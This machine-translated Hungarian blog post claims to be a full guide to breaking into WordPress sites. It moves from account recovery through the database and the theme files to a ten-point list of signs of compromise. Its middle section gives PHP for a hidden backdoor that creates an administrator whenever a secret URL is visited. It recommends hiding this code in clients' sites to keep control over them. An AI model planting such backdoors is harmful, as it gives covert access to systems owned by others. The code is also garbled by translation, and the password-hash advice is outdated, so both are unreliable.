Hogyan lehet feltörni egy WordPress webhelybe, a teljes útmutató

Hogyan behatolhatunk a WordPress webhelyére, a teljes útmutató


Nem engedelmeskedünk, nem hagyunk jóvá és nem ösztönözzük semmilyen illegális vagy rosszindulatú magatartást! A cikk célja, hogy elmagyarázza, hogyan támadhatja meg vagy kaphatja vissza az Önhöz tartozó WordPress-webhelyekhez való hozzáférést, vagy hogy rendelkezik szerkesztési, adminisztrációs és hozzáférési jogokkal. Bármit is csinál, egyedül csinálja. Nem vagyunk felelősek az Ön tetteiért. Ez az útmutató csak oktatási célokat szolgál.

A leírt módszerek segít abban, hogy visszanyerje a webhelyhez való hozzáférést akkor is, ha már nincs fiókja, de valamilyen információt igényel a webhelyről, és ezek nem fognak segíteni a WordPress véletlenszerű telepítésében..

Ebben az útmutatóban megmutatjuk Önnek:

 • Hogyan behatolhatunk egy WordPress webhelyre
 • Hogyan hozzunk létre hátsó ajtót a WordPress programban?
 • Új felhasználói fiók létrehozása az FTP-n keresztül
 • 10 jel azt jelenti, hogy a WordPress webhelyét feltörték

Hogyan behatolhatunk a WordPress webhelyére, a teljes útmutató

Olyan helyzetek, amelyekben segíthet

Ha a következő helyzetek valamelyikében van, módszereink segítik a hozzáférés visszaszerzését:

 • elfelejtette a felhasználónevet vagy az e-mail címet
 • A jelszó visszaállítása opció nem működik a tárhely-kiszolgálón
 • a jelszó visszaállításával kapcsolatos e-mailek nem jönnek át
 • már nem fér hozzá a fiók e-mail címéhez
 • tudod a felhasználónevet és a jelszót, de a kombináció csak nem működik

Az alábbiakban ismertetett módszerek használatához szüksége van a következők közül csak egy:

 • FTP hozzáférés a szerverhez, vagy
 • cPanel hozzáférés a szerverhez, vagy
 • hozzáférés a MySQL adatbázishoz és annak távoli elérhetősége

1. módszer – a MySQL módszer

Ezzel a módszerrel megváltoztathatja a meglévő felhasználó jelszavát (vagy szükség esetén felhasználónevét), vagy új fiókot hozhat létre. Szüksége lesz cPanel hozzáférésre vagy közvetlen MySQL hozzáférésre a webhely adatbázisához. Kezdjük meg egy meglévő felhasználó jelszavának megváltoztatásával.

Ha cPanel-t használ, akkor jelentkezzen be (a cPanel-hez mindig hozzáférhet a https://yoursite.com:2083 link), keresse meg és nyissa meg a phpMyAdmin alkalmazást. A bal oldalon található az adatbázisok és táblázatok listája. Az a végén lévő táblát keresi _users. Valószínűleg az lesz wp_users, de ha egynél több WordPress-hely van telepítve a kiszolgálóra, akkor meg kell találnia a megfelelőt.

A jobb oldali táblában a szerkeszteni kívánt felhasználó található. Ugyanezt az eljárást követi, ha valamilyen külső ügyfélen keresztül kapcsolódik a MySQL-hez, például SQLyog. Miután megtalálta a táblázatot és a tényleges felhasználói rekordot, ideje megváltoztatni a jelszót.

Amint valószínűleg rájöttél már, a jelszó a user_pass mező, kivonat az MD5 algoritmus segítségével. Nyissa meg a online MD5 generátor írja be a használni kívánt jelszót, majd kattintson a „Hash” elemre.. Másolja a generált karakterláncot, és cserélje ki az eredeti jelszót ezzel. A phpMyAdmin alkalmazásban a mezőt duplán kattintva szerkesztheti. Az eljárás hasonló más MySQL ügyfeleknél. Mentse el a változtatásokat és jelentkezzen be a WordPress-be új jelszóval.

WP felhasználók táblája

A felhasználónevek, a kivonatos jelszavak és az e-mailek a wp_users adatbázis táblázat

Még mindig az 1. módszernél – új felhasználó létrehozásakor

Új felhasználó létrehozása egy kicsit bonyolultabb, de kevesebb, mint egy perc alatt kezelhető. Hozzon létre egy új rekordot a felhasználói táblában és a lakosságban: user_login, user_pass (hashed, a fent leírt MD5 funkció használatával) és user_email. Az összes többi mező üres lehet; nem számítanak. Mentse az új rekordot. A mentés után a MySQL egyedi azonosítót fog kapni. Ez az azonosító mezőben szereplő szám. Emlékezz rá.

Most menj ide _usermeta asztal. Emlékezik, a táblázat előtagjának meg kell egyeznie a felhasználóéval. Például wp_users és wp_usersmeta. Ha az előtag nem ugyanaz, akkor helytelen táblát szerkeszti (valamilyen más WP telepítésnél), és az új fiók nem fog működni. Két új lemezt hozunk létre. Figyelmen kívül hagyja a umeta_id mező mindkettő számára. Készlet Felhasználói azonosító mezőt az emlékezett értékre (az új azonosító értéke a felhasználók táblájában). Az első rögzített készlethez meta_key nak nek wpct_user_level és meta_value nak nek 10. A másodikra meta_key nak nek wpct_capabilities és meta_value nak nek a: 1: {s: 13: "adminisztrátor"; b: 1;}. Mentse mindkettőt. Kész – bejelentkezés!

2. módszer – a function.php módon

Ez a megközelítés felhasználható a function.php szerkesztésével a cPanel segítségével, vagy egy FTP kliens használatával. CPanel használata esetén keresse meg a Fájlkezelőt, és nyissa meg. Először meg kell találnunk az aktív téma mappáját.

Menj public_html / wp_content / témák mappába. Nagyszerű, ha azonnal látja a témáját, és tudja, melyik a legjobban. Nyissa meg a mappáját, és indítsa el a szerkesztést functions.php. Ha nem, nyissa meg a webhelyet, kattintson a jobb gombbal bárhol, válassza a „Forrás megtekintése” lehetőséget. Ezután nyomja meg a Ctrl + F billentyűket, és kezdje el gépelni / Themes / hamarosan sok URL lesz kiemelve, és felismeri az aktív téma mappa nevét.

Keresse meg a fájlszerkezetben, nyissa meg és kezdje el a szerkesztést functions.php. Másolja / illessze be a következő kódot a fájl végére. Ne felejts el a bezárást ?> PHP-címkék, ha vannak. Az utolsó sorban kell lennie. Tehát illessze be a kódot előttük.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! felhasználónév_ létezik ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (tömb ('ID' => $ user_id; 'becenév' => $ new_user_email));

$ user = új WP_User ($ user_id);
$ Felhasználó-> set_role (adminisztrátor ');
}

Csak a kód első két sorát szerkesztheti, hogy tükrözze az új fiókját. Ha már van egy felhasználó a WP-ben azzal az e-mailvel, akkor új fiókot nem hoz létre, ezért győződjön meg arról, hogy új. Cserélje ki a jelszót is – ne csapjon be a szkript-kidolgozók körébe. A fájl mentése után egyszerűen nyissa meg a webhelyet, a program futtatja a kódot, létrehoz egy új fiókot rendszergazdai jogosultságokkal, és ezzel be tud jelentkezni..

Miután ezt megtette, ne felejtse el törölni a kódot functions.php.

Egyéb hakkolási módszerek

Az FTP, a cPanel vagy a MySQL jelszó ismeretével igazolja, hogy törvényes hozzáférési joggal rendelkezik a szerverhez, és ezért hozzáférnie kell a WordPress telepítéséhez is. Ha még nem rendelkezik ezekkel a fiókokkal, akkor semmi jót teszel (behatolhatsz más emberek webhelyeire), és ez nem jó!

Ne feledje, hogy bármilyen számítógéphez, webhelyhez vagy szerverhez való jogosulatlan hozzáférés komoly bűncselekmény, és a legtöbb országban azonnal kezelik.

Ha attól tart, hogy a WordPress-webhely feltörhető, kérjük, ellenőrizze ezt az oldalt ingyenes WordPress-biztonsági szkennerrel. Ha nincs ideje beállítani a blogját, hadd tegyük meg érted.

Hogyan hozzunk létre hátsó ajtót a WordPress programban?

Ha a bejárati ajtó be van zárva, akkor megpróbálhatja a hátsó ajtót. Úgy tűnhet, hogy rosszindulatú módon használjuk a kódot a webhelyre való belépéshez anélkül, hogy hozzáférnénk a webhelyhez, de valójában vannak olyan esetek, amikor ellenőriznie kell a saját webhelyét, ha valaki ellopta.

Ha webhelyeket hoz létre mások számára, amit csinál, előbb-utóbb lesz olyan ügyfél, aki megtagadja fizetését neked a munkájáért; egy ügyfél, aki törli az Ön bejelentkezési adatait, és átveszi az összes te irányítást. Időnként elegendő új felhasználó létrehozása FTP-n keresztül vagy jelszó visszaállítása. Ha ez nem elég, érdemes lehet visszatérni, vagy hozzon létre egy hátsó ajtó hozzáférést az adminisztrátori oldalakhoz.

De ha úgy döntött, hogy egy kis darab kódot elrejt a WordPress környezetében, megmentheti magát valamilyen méltósággal és adminisztrátori jogosultságokkal férhet hozzá a WordPress webhelyhez. És itt kezdődnek a játékok.

Függetlenül attól, hogy hányszor törli az Ön adatait, vagy visszaállít egy biztonsági másolatot egy valószínűleg birtokában lévő szerveren, van esély, hogy semmit sem tud a hátsó ajtó bejáratairól. Ha igen, valószínűleg nem is lesz szüksége a segítségére a WordPress beállításában, igaz?

Hozzon létre egy hátsó ajtót:

OK, elég a beszélgetéshez; Íme egy kódrészlet, amelyre szükség lesz a munka elvégzéséhez:

 1. Nyissa meg a function.php fájlt
 2. Másolja / illessze be a következő kódot:
 3. add_action ('wp_head', 'wploop_backdoor');
  funkció wploop_backdoor () {
  If ($ _GET ['backdoor'] == 'knockknock') {
  igényelnek ( 'wp-includes / registration.php');
  If (! Username_exists ('felhasználónév')) {
  $ user_id = wp_create_user ('név', 'átadás');
  $ user = új WP_User ($ user_id);
  $ Felhasználó-> set_role (adminisztrátor ');
  }
  }
  }
  ?>
 4. Változtatások mentése

Ha hagyja a kódot, ahogy van, akkor csak egy látogatást kell tennie, hogy új adminot hozzon létre a webhelyen http://www.yourdomain.com/?backdoor=knockknock

Az oldal betöltése után az új felhasználóneved “név” és jelszó „Pass”.

természetesen, megváltoztathatja ezt a kódban fent a „név” és „átadás” megváltoztatásával amit akarsz. A hátsó ajtó linkjét megváltoztathatja úgy is, hogy a „hátsó ajtót” és / vagy „kopogtatást” megváltoztatja bármire, amivel felmerült..

Próbáld ki a funkciót – nem csak szórakoztató, de valóban bármikor segíthet a jövőben, amikor weboldalt készít olyan személyek számára, akikben nem tud teljes mértékben bízni. Szintén fel kell emelnie a WordPress és a blogkészítési képességeit.

Új felhasználói fiók létrehozása az FTP-n keresztül

Új felhasználói fiókok létrehozása a WordPress-en nagyon egyszerű. Rendszergazdaként meg kell keresse meg a Felhasználók admin oldalát ahol új felhasználói fiókot hozhat létre bármely felhasználói szerepkörhöz. Ez másodpercek alatt elvégezhető, és egy újonnan létrehozott felhasználó azonnal bejelentkezhet megadott felhasználónévvel és jelszóval.

De mi történik, ha elveszíti a hozzáférést a WordPress rendszergazdához? A dolgok kicsit bonyolultabbá válhatnak, de ne aggódjon – van egy olyan funkciónk az Ön számára, amely megmentheti az adminisztrátor életét.

Függetlenül attól, hogy egy másik rendszergazda törölte-e a fiókját, és hogy véletlenül törölte-e az összes felhasználót az adatbázisból, hibásan működő plugint használt-e vagy megtörtént-e feltörést, továbbra is visszatérhet az irányításhoz. Előfordulhat, hogy csak az FTP-szerverhez fér hozzá, míg a HTTP nem elérhető, és új adminot kell létrehoznia. Noha ez ritka eset lehet, a következő funkció megtakarít.

Új fiók létrehozása a WordPress adminisztrációs környezetén kívül, amire szükséged lesz egy FTP hozzáférés a webhelyéhez. Rendszergazdaként minden szükséges információval rendelkeznie kell a kiszolgálóra való bejelentkezéshez, és gyorsan létrehozhat egy új fiókot egy új funkció létrehozásával a témában.

Hozzon létre új felhasználói fiókot az FTP-n keresztül:

 1. Nyissa meg az FTP klienst, és csatlakozzon a fiókjához
 2. Keresse meg a wp-tartalmat / témákat
 3. Nyissa meg a használt téma mappáját
 4. Keresse meg a function.php fájlt és szerkessze azt
 5. Másolja és illessze be a következő funkciót:
 6. függvény admin_account () {
  $ user = 'Felhasználónév';
  $ pass = 'Jelszó';
  $ email = '[email protected]';
  if (! username_exists ($ felhasználó) &&! email_exists ($ email)) {
  $ user_id = wp_create_user ($ user, $ pass, $ email);
  $ user = új WP_User ($ user_id);
  $ user-> set_role ('adminisztrátor');
  }}
  ADD_ACTION ( 'init', 'admin_account');
  
 7. Cserélje ki a felhasználónevet, a jelszót és az e-mailt valami egyedira
 8. Változtatások mentése

Győződjön meg arról, hogy a felhasználó által megadott felhasználónév, jelszó és e-mail cím egyedi különben a funkció nem fog megfelelően működni. Miután elmentette a változtatásokat, elkészült és navigálhat a WP bejelentkezési panelen. Az új információkkal jelentkezzen be újra, és miután ellenőrizte a fiókot, törölheti a függvényt a function.php fájlból.

A fenti funkció létrehoz egy rendszergazdai fiókot, de könnyen módosíthatja, hogy bármilyen más felhasználói szerepkörrel rendelkező fiókot hozzon létre. Egyszerűen változtassa meg a szerepet a 8-onth sor a kódot a szerkesztő, szerző, közreműködő, előfizető vagy bármely más felhasználói szerepkörhöz, amelyet létrehozott.

Sajnos, ha elvesztette admin fiókját, elvesztette az összes felhasználónevét is. Ezért mindig tartson biztonsági másolatot, amelyet könnyen letölthet. Ha ezt olvassa el, miközben rendelkezik adminisztrátori fiókkal, vegye ezt emlékeztetőnek arra, hogy azonnal készítsen biztonsági másolatot és könyvjelzővel jelölje meg ezt a cikket, csak arra az esetre, ha a jövőben a WordPressen kívüli fiókot kell létrehoznia.

10 jel azt jelenti, hogy a WordPress webhelyét feltörték

A WordPress egy hatalmas blogplatform. Több millió felhasználó van, és úgy tűnik, hogy a szám minden nap gyorsan növekszik. Az emberek még inkább, mint gondolnák, gyakran átviszik más tartalomkezelő rendszerekben létrehozott webhelyüket erre a nyílt forrású rendszerre. És bár ez jó, ez azt jelenti A hackerek a WordPress-et is első helyen helyezik el, amikor megpróbálnak betörni a véletlenszerű webhelyekbe.

Általában, ha feltörtek, erről azonnal tudomást szerez. A webhely hozzáférhetetlenné válik; nem fog bejelentkezni, és a hackerek néha üzenetet hagynak a kezdőlapon. De gyakrabban, mint nem, akkor nem is veszi észre, hogy valami megváltozott. A cikk ebben a részében számos jelet mutatunk be, amelyek azt jelezhetik, hogy a WordPress-webhely feltörték, és néhány megoldást kínál a problémára.

1. Sikertelen bejelentkezés

Ez a jel nagyon nyilvánvaló. Ha egy ideig felhasználónevet és jelszót használ, anélkül, hogy bármilyen probléma lenne, akkor gyanúba kerülhet, ha a WordPress hirtelen nem ismeri fel fiókját. Ha egy hackernek be kell jelentkeznie a webhelyére, akkor valószínű, hogy gyorsan megváltoztatja az adminisztrátori jogosultságait.

Lehet, hogy meg kellett változtatnia a jelszavát, vagy teljesen törölnie kellett a fiókját. Mielőtt elkezdene pánikba esni, miután a WordPress első alkalommal üzenetet küld a helytelen felhasználónévről / jelszóról, vegye figyelembe azt a tényt, hogy helytelen kombinációt adott meg, vagy hogy bekapcsolta a caps lock gombot.

Megoldás: Próbálja meg helyreállítani a jelszót e-mailben, vagy használjon másik fiókot a bejelentkezéshez. Annak érdekében, hogy a belépés biztonságban maradjon, javasoljuk, hogy telepítse Bejelentkezés Ninja plugin a WordPress-hez.

2. Rosszindulatú tartalmat adunk az Ön webhelyéhez

A webhely rosszindulatú programokra vonatkozó figyelmeztetést tartalmaz

Ha elkezdi észrevenni egy ismeretlen tartalmat a webhelyén, aggódhat. Amikor esélyt kapnak az adminisztrációs terület elérésére, A hackerek megváltoztathatják a magját, valamint a téma- és a plugin-fájlokat. Ez azt jelenti, hogy bármit megváltoztathatnak, amit akarnak.

Míg egyes hackerek drasztikusan módosítják az Ön webhelyének megjelenését, és talán még azt is kifejtik, hogy megtámadtak, addig a többi sokkal finomabb..

Megoldás: Próbáljon rejtett tartalmat keresni a webhely kódjában. Lehet, hogy vannak linkek rosszindulatú webhelyek hackereihez, amelyeket a webhely láblécébe ültettek, vagy telepítettek olyan felbukkanó ablakokat, amelyek rendszeresen megnyílnak az ügyfelek számára. A Security Ninja használatával ellenőrizze webhelyét, vagy folyamatosan figyelje webhelyét az ilyen problémákra.

3. Gyanús látogatások

Ha nem követi webhelyét, akkor azonnal el kell kezdenie. Ennek egyszerű módja a Google Analytics használata, amely számos egyéb szolgáltatás mellett megmondja, hány látogatást ér el, és honnan származnak ezek a látogatások. Egy idő után megismerheti webhelyét. Ez azt jelenti, hogy tudni fogja, ahonnan jönnek a látogatások, és amikor új kampányt indít, és mikor jelennek meg új promóciós linkek a vadonban.

De ha hirtelen észreveszi, hogy webhelye óriási számú új látogatást kap a gyanús domainről, érdemes tovább vizsgálni ezt, mert webhelyét esetleg csak feltörték. Az ilyen látogatások általában 100% -os visszafordulási arányt eredményeznek, ami azt jelenti, hogy csak egy oldalhoz jutottak el. A hackerek gyakran automatizált rendszereket használnak, amelyek más rossz webhelyeket vezetnek a tiédhez. Függetlenül attól, hogy a rossz kódot végrehajtják az Ön webhelyén, vagy egy spam-hálózat részévé vált, a dolgok súlyossá válhatnak, és ellenőriznie kell, hogy webhelyén nincs-e rosszindulatú kód.

Megoldás: Használat Google Webmesterek Eszközök gyanús domaineket találni

4. A forgalom hirtelen csökkenése

Biztonságos böngészés a webhely állapotában

A hackelés utoljára említett jeleivel ellentétben ez figyelmeztethet, mert hirtelen csökken a látogatások száma. Ahelyett, hogy új látogatásokra utalna, hackerek látogatásokat küldhetnek az Ön webhelyén. Ez akkor fordulhat elő, mert egy hacker egy másik webhelyre irányította az Ön webhelyét. A kevesebb látogató megszerzésének másik oka az, hogy a Google feketelistára adta az Ön webhelyét. Ez a művelet üzenetet jelenít meg minden olyan felhasználó számára, aki úgy dönt, hogy nem nyitja meg webhelyét, mert a fertőzött.

Megoldás: Használja a Google-t Biztonságos böngészés webhely állapota hogy ellenőrizze, hogy webhelye nem biztonságos-e, és jelenleg veszélyes-e meglátogatni.

5. A keresőmotor eredményei furcsa

Ha nem vett észre semmilyen változást a webhelyén, de rájött, hogy a Google és más keresőmotorok keresési eredményei furcsa (különböző címeket és egyéb meta-adatokat mutatnak), ez valószínűleg egy feltört webhely jele. A hacker valószínűleg megváltoztatta tartalmát oly módon, hogy csak a szakértők láthassák. Ennek ellenére a változás látható lesz a keresőmotor eredményeiben.

Megoldás: Ellenőrizze webhelyét a Google Webmesterek Eszközök, és ellenőrizze, hogy a webhelyét feltörték-e ezzel ingyenes online eszköz.

6. Nem küldhet és fogadhat e-maileket

Amint a hackerek hozzáférést kapnak az Ön webhelyéhez, valószínűleg azt akarja használja a szerverét spamküldéshez. Amikor rájössz, hogy nem küldhet vagy fogadhat új e-maileket a WordPress-től, ez egyértelmű jel lehet, hogy csapkodott be. Ellenőrizze újra az e-mail címét, majd ellenőrizze a szolgáltatótól, hogy megbizonyosodjon arról, hogy nincs-e hiba.

Megoldás: Tesztelje a WordPress-t mail funkció ezzel az ingyenes bővítménnyel.

7. A webhely nem létezik

A kiszolgáló nem található

Vannak esetek, amikor a hackerek nem férnek hozzá az Ön webhelyéhez, hogy kártékony kódot telepítsenek, átirányítsák a felhasználókat, vagy az e-maileket spamként használják. Néha, csak annyit akarnak csinálni, hogy összeomlik a webhely. Ritkán egy hacker sikeresen töröl mindent az egész szerverről. Ezért fontos, hogy fájljait egy neves tárhelyszolgáltatóban tárolja, amely biztonságot vállal és webhelyének napi vagy legalább heti biztonsági másolatát is megőrzi. Jó gyakorlat, hogy időről időre saját biztonsági mentéseket is készít, hogy a webhely gyorsan helyreállítható.

Megoldás: Telepítse a WordPress biztonsági mentésének kezelésére szolgáló egyik legjobb bővítményt.

8. Gyanús fájlok

Hasonló a rosszindulatú tartalmakhoz, amelyeket hozzáadhatunk a meglévő fájlokhoz, a hackerek további fájlokat ültethetnek a gyökérmappába bárhol. Jó dolog megismerni a WordPress körüli utat, de ha nem vagy ilyen tapasztalt, akkor rendelkeznie kell egy biztonsági eszközzel, amely ellenőrizheti az összes fájlt és tevékenységet. A közelmúltban áttekintettük a biztonsági nindzsát, amely tökéletes eszköz az összes WordPress-fájl ellenőrzéséhez.

Megoldás: Próbálja ki azokat a fájlokat, amelyek nem tartoznak a WordPress telepítéséhez. A Security Ninja használatával rendszeresen ellenőrizheti webhelyét, és automatikusan megtalálja ezeket a fájlokat. Ezután törölje a fájlokat, vagy távolítsa el a rosszindulatú kódot a fertőzött fájlokból. Ne felejtsd el a Security Ninja Core Scanner kiegészítőjét.

9. Új tagok

Webhelyétől függően előfordulhat, hogy Ön az egyetlen, aki új tagokat tud felvenni. Ebben az esetben az újonnan regisztrált felhasználókról szóló e-mail riasztást válthat ki. Ha vannak más rendszergazdák, akik képesek új tagokat felvenni, ellenőrizze velük a gyanús tevékenységeket.

Megoldás: Cserélje ki a bejelentkezési URL-t egy ingyenes bővítménnyel, korlátozza a hozzáférést a WordPress bejelentkezési oldalához a .htpasswd fájl használatával, és a Login Ninja segítségével védje meg bejelentkezési formáját.

10. Nézze meg a szerveren ütemezett eseményeket

Időnként a hackerek nem csinálnak semmit a webhelyeddel, mihelyt megtalálják az utat. Ehelyett, elhagyják a tervezett eseményeket amely a jövőben valamikor károsíthatja webhelyét. Ez a technika veszélyes, mivel a hackerek a tapasztalatlan áldozatot kezdetben tudatlanul hagyhatják. Lehet, hogy fertőzött, és semmit sem tud róla.

Megoldás: Ellenőrizze CRON feladatait egy használt szerveren, és ellenőrizze, hogy nincsenek-e gyanús ütemezett feladatok.

Csomagolás

Reméljük, hogy ez a cikk segít még egy biztonságosabb WordPress-webhely kezelésében, és segít visszajuttatni a webhelyhez rossz helyzetekben. És még akkor is, ha webhelye tiszta, kérjük, ne vegye azt magának.
Mindig győződjön meg arról, hogy blogja a lehető legbiztonságosabb. Javasolunk biztonsági bővítményeket a WordPress számára, amelyek legfeljebb megtakarítást eredményezhetnek. Ennek ellenére ne használjon nem biztonságos jelszót, és legyen óvatos, amikor behatol a saját WordPress webhelyére.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
  Like this post? Please share to your friends:
  Adblock
  detector
  map